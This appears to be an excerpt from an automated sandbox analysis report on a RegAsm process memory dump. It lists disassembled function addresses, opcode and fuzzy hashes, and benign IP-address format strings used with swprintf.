                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d8066958ec5d33947a271faead141de5f22f97475ae26f06bc2b9b5b576a831
                                                              • Instruction ID: 467f8326452664790409cb816fcc3f282507ba5bfbff0a768b7bfc9ca2dccff4
                                                              • Opcode Fuzzy Hash: 6d8066958ec5d33947a271faead141de5f22f97475ae26f06bc2b9b5b576a831
                                                              • Instruction Fuzzy Hash: ED900225221404120245B558464450B444697D63D13D5C015F2416594CC63189655321
                                                              Function 02FE2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 5e5d2f03a16cac0ec6fec727b06fd835f2247ef58eac930a8913266ebf79747a
                                                              • Instruction ID: 24aadf46f2baedec3867680144f6450782daf08a7e5687c49462180265f3d925
                                                              • Opcode Fuzzy Hash: 5e5d2f03a16cac0ec6fec727b06fd835f2247ef58eac930a8913266ebf79747a
                                                              • Instruction Fuzzy Hash: 7051F4B1A00645AADF21DE5CCE9097FB7FDAF44280B44845AEA97C7641FB74EA04CB60
                                                              Function 02FE20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: b6fa632c9ad2275f2a7ff1b18b9774535356784effca7f852df13a4160106c1b
                                                              • Instruction ID: fc87a012a7519baf33db7f6833e2969e7e96d542d71d77f9687399a078883d6a
                                                              • Opcode Fuzzy Hash: b6fa632c9ad2275f2a7ff1b18b9774535356784effca7f852df13a4160106c1b
                                                              • Instruction Fuzzy Hash: A1213376E00119ABEB11DE79DC44AAEB7FDEF54784F440116EE06E3200FB34DA059BA1
                                                              Function 02FE2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: a6d0d442f88b5dfbfb19dc952c9277823bde98c928dc431bd409c6dc02cfa95f
                                                              • Instruction ID: 6706a32b524bc2172ffc7e974836bc1eaa3ae62d79db990e9384e65e3bbeb56c
                                                              • Opcode Fuzzy Hash: a6d0d442f88b5dfbfb19dc952c9277823bde98c928dc431bd409c6dc02cfa95f
                                                              • Instruction Fuzzy Hash: 80315472A002199FDB21DE29CC40BEEB7FDEB44694F44455AED4AE3244EB30DA448FA0